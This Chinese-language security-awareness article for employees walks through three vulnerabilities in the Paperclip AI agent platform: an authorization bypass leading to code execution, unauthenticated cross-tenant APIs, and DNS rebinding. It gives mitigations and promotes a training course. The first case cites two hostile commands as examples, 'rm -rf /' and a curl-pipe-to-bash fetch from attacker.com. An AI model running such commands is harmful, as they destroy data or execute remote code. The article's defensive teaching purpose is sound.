“安全不是一套技术,而是一种思维方式。” —— 约翰·穆尔根

在数字化、智能化、智能体化迅猛发展的今天,信息系统的边界被不断模糊,攻击者的手段也从传统的“敲门”演进为“潜行”。近日,著名安全研究机构 Oasis Security 公布的 Paperclip 系列漏洞,正是一次典型的警示:当我们把 AI 代理 当作普通软件来使用,却忽视了它的 身份、授权、信任 三大基石时,整个组织的安全防线可能在瞬间崩塌。
为帮助全体职工快速提升安全意识,本文将围绕 3 大典型案例 进行深度剖析,随后结合当下 数据化、智能化、智能体化 融合的大背景,呼吁大家踊跃加入即将开启的 信息安全意识培训,让每一位员工都成为安全的“守门人”。
一、案例一:冒名注册+授权绕过 → 远程代码执行(CVE‑2026‑41679)
背景与漏洞概述
Paperclip 作为开源的 AI 代理平台,允许用户通过 Web UI 或 CLI(命令行) 注册、配置、运行各类智能体。平台在默认部署时,提供了 “board_level”(董事会级)和 “admin”(管理员)两层权限。
研究人员发现,攻击者无需任何凭证,即可在公开的 Paperclip 实例上自行注册账户,随后利用 “自助授权” 功能,直接批准自己的 CLI 授权请求,瞬间获得 board_level 权限。更关键的是,导入公司(company) 的工作流仅校验了 board_level 权限,而 创建公司 本身却要求 admin 权限。于是攻击者可以:
- 创建恶意
.paperclip.yaml,其中嵌入 process‑based agent,指向系统命令(如rm -rf /或curl http://attacker.com/payload | bash)。 - 上传该文件 作为公司导入包。
- 触发导入,平台在解析 YAML 时执行恶意脚本,代码在 Paperclip 服务器的系统权限 下运行,实现 远程代码执行(RCE)。
影响范围
- 任意服务器:只要平台未及时升级,攻击者即可在几分钟内获得系统最高权限。
- 数据泄露:攻击者可进一步读取、修改存储的业务数据、模型文件等敏感信息。
- 横向渗透:利用获得的服务器权限,攻击者可在内部网络继续扩散,攻击其他业务系统。
教训与对策
- 最小特权原则:任何注册后默认赋予的权限必须严格限制,尤其是涉及 CLI 授权 的功能。
- 双因素审批:关键操作(如 board_level 权限提升、公司导入)应配合 多层审批(管理员+安全审计)。
- 配置即代码的安全审计:所有
.yaml、.json等配置文件应通过 静态分析 检查是否包含可执行指令或高危插件。 - 及时打补丁:官方已在 2026.416.0 版中修复此漏洞,务必保持系统更新。
二、案例二:未授权 API 泄露 → 跨租户信息曝光
背景与漏洞概述
Paperclip 为了便利开发者,开放了多套 RESTful API 用于查询 workflow、skill、deployment 等元数据。研究团队发现,部分 API 未进行身份验证,甚至在多租户(tenant)环境下未做 租户授权 检查,导致:
- 任意请求者可访问 所有租户 的工作流定义、技能文档、部署元数据。
- 通过这些信息,攻击者能够 绘制完整的攻击面图谱,定位高价值资产(如金融模型、业务规则)。
影响范围
- 商业机密泄露:竞争对手或内部威胁可获取未公开的业务流程。
- 社工攻击:攻击者利用收集的组织结构信息,进行精准的钓鱼或冒充攻击。
- 后续渗透:获取的 API 路径和参数可用于构造更深层的利用链。
教训与对策
- 统一认证:所有 API 必须走 统一身份认证系统(如 OAuth2、OpenID Connect),并在网关层统一校验。
- 租户隔离:在多租户系统中,每一次资源访问 必须校验 租户标识,确保数据不被跨租户读取。
- 安全审计日志:对每一次 API 调用记录 用户、租户、操作、时间,并对异常访问行为进行实时告警。
- 安全测试:在 CI/CD 流程中加入 API 安全扫描(如 OWASP API Security Top 10)并执行渗透测试。
三、案例三:DNS 重绑定 → 本地服务被利用(CVSS 9.6)
背景与漏洞概述
Paperclip 的 local_trusted 部署模式默认假设 访问 localhost(127.0.0.1) 的请求均来自可信软件。攻击者利用 DNS 重绑定(DNS Rebinding)技术,将恶意网页的域名解析为 127.0.0.1,从而让浏览器在用户不知情的情况下向本地 Paperclip 实例发起请求。具体流程如下:
- 攻击者控制的网站 返回 恶意 JavaScript。
- 通过
dns rebinding将域名指向攻击者的服务器,随后又切换指向 127.0.0.1。 - 浏览器发起跨域请求,冲破同源策略(因为已被重新绑定为同源),向本地 Paperclip 发送 恶意指令。
- 利用 前文提到的导入漏洞,攻击者在本地导入携带恶意代码的 agent,最终在开发者机器上执行任意命令。
影响范围
- 开发者机器被攻陷:即使是内部网络,攻击者也能通过一次访问恶意网页,实现对公司内部系统的渗透。
- 供应链风险:若受感染机器被用于 CI/CD,恶意代码可进一步进入生产环境。
教训与对策
- 禁用默认信任:任何 本地主机 的请求都不应默认被视为可信,必须进行 身份验证。
- 强制 Hostname 校验:平台应检查
Host请求头,确保请求来源于合法域名。 - 浏览器安全策略:在内部开发环境中,开启 Content Security Policy(CSP),限制脚本加载源,防止页面被注入恶意脚本。
- 网络层防护:使用 内部 DNS 防火墙 阻止 DNS 重绑定攻击,或在防火墙上限制对 127.0.0.1 的外部访问。

四、从漏洞看时代:数据化、智能化、智能体化的安全挑战
1. 数据化 —— 信息是燃料,亦是诱饵
- 数据湖、数据中台 的建设让海量业务数据集中管理,成为攻击者的“金矿”。
- 数据脱敏、访问控制 必须贯穿数据流全生命周期,才能防止泄露。
2. 智能化 —— AI 赋能,同时也放大风险
- 大模型 与 生成式 AI 能帮助业务快速生成报告、代码、营销文案,但 模型窃取、对抗样本 同样随之而来。
- AI 代理(如 Paperclip)不再是单纯的工具,而是具备 自动决策、跨系统调用 能力的“微型服务”,其 身份与授权 必须像人类用户一样严密管理。
3. 智能体化 —— 多代理协同,边界模糊
- 在 多智能体 场景下,信任链 变得错综复杂:一个智能体的失误可能导致整个生态的失控。
- 链式授权、零信任(Zero Trust) 理念必须上升至 智能体层面:每一次调用都要验证 “谁在调用、为何调用、是否在授权范围内”。
综上,我们正站在 “信息安全从防火墙向信任链” 转型的十字路口。若仍抱残守缺,只会让攻击者轻易找寻漏洞;若敢于拥抱新模型、新技术的安全治理,才能在激烈的竞争中保持主动。
五、号召:让每位同事成为安全的第一道防线
1. 参与即将启动的“信息安全意识培训”
- 培训时间:2026年9月1日至9月30日(线上 + 线下双轨)
- 培训对象:全体员工(技术、业务、管理均需参与)
- 培训内容:
- 基础安全概念(机密性、完整性、可用性)
- AI 代理安全(身份、授权、配置即代码)
- 实战演练:模拟 Paperclip 漏洞利用与防御
- 数据安全与合规(GDPR、ISO27001)
- 安全意识日常:邮件钓鱼、密码管理、设备安全
2. 培训收益
- 提升风险感知:能够在日常工作中主动发现异常行为。
- 减少安全事件:据统计,接受安全培训的员工所在团队,安全事件发生率下降 38%。
- 职业竞争力:拥有信息安全基本功的员工,在内部晋升与外部招聘中更受青睐。
3. 行动指南
| 步骤 | 操作 | 说明 |
|---|---|---|
| ① | 登录公司内部培训平台(网址:training.lanran.com) | 使用公司统一身份认证登录 |
| ② | 选取适合自己的课程批次 | 业务部门或技术部门分别有针对性课程 |
| ③ | 完成线上学习 + 现场实操 | 实操环节包括“模拟攻击–防御”演练 |
| ④ | 通过结业测评,获取 安全意识证书 | 合格者可在年度考核中加分 |
| ⑤ | 将所学分享至部门例会 | 形成“技能沉淀”,提升团队整体防御能力 |
4. 小贴士:让安全学习不再枯燥
- 案例改编:将 Paperclip 漏洞故事改写为“公司内部的“间谍””。
- 游戏化:在培训平台设置 安全积分榜,每捕获一次模拟攻击即得积分。
- 段子时间:安全专家们常说:“防火墙是门,零信任是钥匙,密码是锁芯。” 把这些口诀背在心里,关键时刻自然会用上。
六、结语:从“纸夹”到全员防御,安全是一场没有终点的马拉松
信息安全不再是 IT 部门的专属任务,它已经渗透到 每一行代码、每一次点击、每一段对话。正如 Paperclip 漏洞所提醒我们的—— “身份与授权的每一次疏忽,都可能酿成系统级别的灾难”。
在这个 数据驱动、AI 赋能、智能体协同 的新纪元,每位员工都应成为安全链条上的关键环节。我们期待在即将开启的安全培训中,看到大家从“警惕”走向“主动”,从“防御”走向“预判”。让我们一起,以 信任为基、授权为根、监督为翼,共同筑起组织的安全蓝天。
让安全成为习惯,让防护成为常态——从今天起,向风险说“不”。

信息安全意识培训组 敬上
在日益复杂的网络安全环境中,昆明亭长朗然科技有限公司为您提供全面的信息安全、保密及合规解决方案。我们不仅提供定制化的培训课程,更专注于将安全意识融入企业文化,帮助您打造持续的安全防护体系。我们的产品涵盖数据安全、隐私保护、合规培训等多个方面。如果您正在寻找专业的安全意识宣教服务,请不要犹豫,立即联系我们,我们将为您量身定制最合适的解决方案。
- 电话:0871-67122372
- 微信、手机:18206751343
- 邮件:info@securemymind.com
- QQ: 1767022898